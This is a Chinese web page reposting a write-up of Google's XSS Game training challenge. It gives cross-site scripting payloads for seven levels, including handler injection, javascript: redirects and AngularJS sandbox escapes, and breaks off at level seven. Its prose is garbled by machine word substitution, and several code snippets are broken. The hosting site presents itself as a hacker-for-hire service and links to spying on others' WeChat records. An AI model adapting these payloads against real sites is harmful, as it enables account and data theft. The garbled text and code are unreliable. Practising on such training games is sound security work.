当前位置:首页 > 网络安全 > 正文内容

Google最新XSS Game Writeup

访客4年前 (2021-04-09)网络安全507

本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。
第一关
 反射型xss,在搜索框提交的内容终究会出现在成果页面的html代码里,没有任何过滤,直接搜索:
script>alert('freebuf')script>

第二关
 仍是反射型,提交内容后会有必定推迟。经过检查html源码能够知道推迟的时刻(timer=)被直接插入到了img标签里的onload事情里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />

 直接恳求url:/?timer=’-alert(1)-’,通关。
第三关
 展现了一些猫的图片,当图片换了后,url仅仅变化了#后边的内容(#1 > #2),感觉能够经过这个id来反射xss。
检查源代码:
function chooseTab() {
     var html = "Cat " + parseInt() + "
";
     html += " +  + ".jpg' />";
     
     document.getElementById('tabContent').innerHTML = html;
     
     // Select the current tab
     var tabs = document.querySelectorAll('.tab');
     for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
             tabs[i].className = "tab active";
         } else {
             tabs[i].className = "tab";
         }
     }
     
     window.location.hash = ;
     
     // Tell parent we've changed the tab
     top.postMessage({'url': self.location.toString()}, "*");
}
 哼,依据上一关的创意,感觉能够持续运用一下on事情,修正id后,图片肯定是不存在的,所以运用onerror:
    #1'onerror=alert(1)>

 
搞定
第四关
 翻开后是一个注册页面,让咱们填写邮箱地址,注册完结后经过url里边的next参数把咱们跳转回主页,检查源码:
 script>
  setTimeout(function() { window.location = user provided>; }, 1000);
script>
 在html中,链接能够是js代码,比方:
a href="javascript:...">a>
直接恳求这个跳转url:
confirm?next=javascript:alert(1)
 

第五关
 一个F歌(foogle)搜索框,运用了angularJS 1.5.8,感觉是爆过缝隙的,上某网搜索(angularjs 1.5.8 injection)找到运用办法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

 第六关
 angularJS 1.2版别的搜索框,在搜索框中提交的内容终究进到了class为ng-non-bindable的div标签里:
  #一般的div标签
Normal: {{1 + 2}}
  #输出:Normal: 3
  #ng-non-bindable
Ignored: {{1 + 2}}
  #输出:Ignored: {{1 + 2}}
 随后发现假如直接提交花括弧会被删掉,所以运用“{”,终究结构这样一个url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七关
 经过GET(参数menu)和JSONP恳求加载了一个博客页面,而呼应的title,pictures会被处理为h1标签和img标签。关卡提示:common CSP bypass。
 猜想xss

[1] [2]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106205.html

分享给朋友:
返回列表

上一篇:怎么找回微信以前手机聊天记录

下一篇:600查微信聊天记录

“Google最新XSS Game Writeup” 的相关文章

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

黄埔燃料油现货价格_今日燃料油市场价格

这句话是指期货比现货价格高100元吗,柴油,1%的权重都没有,通过技术指标和消息面影响来分析的。有的有点差,点88 国际燃料油收盘价涨跌新加坡。244点5 国内燃料油,燃料油,作为成品油的一种,屈居第二位,有的高点有的低一点,2。97#汽油5点38元/价格升,在原油的加工过程中,常关注的消息为OPE...

宝马528(宝马5系528li报价)

系最终决定选择宝马528.新款BMW,528领先,4400元,另外附525豪华,型57点66万,后驱:525豪华,车型宝马指导售价车型售价报价。 高保真扬声器。小屏、厂家指导价,相差27马力,多功能方向盘电动调节带巡航+换挡拨片、8速变速箱。 jnsdxx2016-2-2323:10:35发表在23...

上海南京东路站街伴游2019-【杨雅瑄】

“上海南京东路站街伴游2019-【杨雅瑄】” 上海伴游陪游旅行网顾建军,上海伴游网顾建军的详细资料一:找真实的经纪人龙家住广州天河区的王先生最近咨询小编问 广州如何学生伴游 ,怎么能获得他们联系方式大家可以先通过百,104,广州学生伴游联系方式,广州商务伴游预约,家住广州天河区的王先生最近咨询小编问...

SSH-MITM:支持公钥认证&会话劫持和文件篡改的安全审计MITM服务器

SSH-MITM-拦截SSH流量 SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。 SSH-MITM安装 在使用任何软件包之前,我们都需要进行正确的安装。如需安装S...

BEABA纸尿裤吸水性怎么样 BEABA纸尿裤使用测评

BEABA尿不湿较为轻巧,那麼BEABA尿不湿的吸水能力如何呢,下边的我就而言说:BEABA尿不湿吸水能力如何 BEABA尿不湿应用评测。 BEABA尿不湿吸水能力如何 产品包装设计的非常好哦,简易大气又有点儿小仙女,赞一个!尿不湿设计方案的挺漂亮哦,很简单的 十分绵软舒适,也够宽够长,不必担...

评论列表

泪灼矫纵
泪灼矫纵
2年前 (2022-07-02)

.8 injection)找到运用办法:?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].ch

回复该评论

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright Your WebSite.Some Rights Reserved.